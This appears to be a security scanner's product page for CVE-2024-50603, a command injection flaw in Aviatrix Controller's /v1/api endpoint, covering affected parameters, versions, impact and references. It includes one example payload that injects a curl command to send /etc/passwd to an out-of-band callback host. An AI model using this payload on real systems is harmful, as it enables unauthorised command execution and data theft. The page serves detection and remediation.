CVE-2024-50603 Scanner
CVE-2024-50603 Scanner - Remote Code Execution vulnerability in aviatrix controller
Short Info
Level
Critical
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
9 days 21 hours
Scan only one
Domain, IPv4, Subdomain
Toolbox
-
Aviatrix Controller is a centralized platform used for managing and monitoring multi-cloud networking solutions. It enables enterprises to configure and maintain their cloud-based infrastructure with a focus on security and scalability. The product is widely adopted by organizations that require seamless integration across multiple cloud service providers. Aviatrix Controller provides features such as automated network creation, dynamic routing, and network security enhancements. This platform is designed for network engineers and security teams to simplify operations and ensure compliance. Its user-friendly interface and robust API make it a popular choice for hybrid and multi-cloud environments.
This scanner detects a Remote Code Execution (RCE) vulnerability in Aviatrix Controller. The vulnerability arises from improper neutralization of special characters used in OS commands. Exploiting this flaw allows an unauthenticated attacker to execute arbitrary commands on the host system. This vulnerability is rated as critical due to its potential impact on confidentiality, integrity, and availability. Attackers can exploit this issue via the `/v1/api` endpoint by sending crafted payloads. This vulnerability is a significant security concern for organizations using vulnerable versions of Aviatrix Controller.
The technical root of this vulnerability is the improper handling of user-supplied input in the `cloud_type` and `src_cloud_type` parameters at the `/v1/api` endpoint. These parameters are used in API actions such as `list_flightpath_destination_instances` and `flightpath_connection_test`. Shell metacharacters within these fields are not correctly sanitized, allowing attackers to execute arbitrary shell commands. For instance, a malicious payload such as `1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})` can be used to exfiltrate sensitive data. The vulnerability affects Aviatrix Controller versions before 7.1.4191 and 7.2.x before 7.2.4996. Organizations must update to secure versions to mitigate this risk.
Exploiting this vulnerability could result in unauthorized command execution on the affected system. Potential impacts include exfiltration of sensitive data, deployment of malicious software, and complete system compromise. Attackers could gain persistent access to the network, undermining organizational security. This could lead to data breaches, service disruptions, and significant financial and reputational losses. The critical nature of this vulnerability demands immediate attention and remediation to prevent exploitation.
REFERENCES
- https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
- https://docs.aviatrix.com/documentation/latest/network-security/index.html
- https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
- https://nvd.nist.gov/vuln/detail/CVE-2024-50603
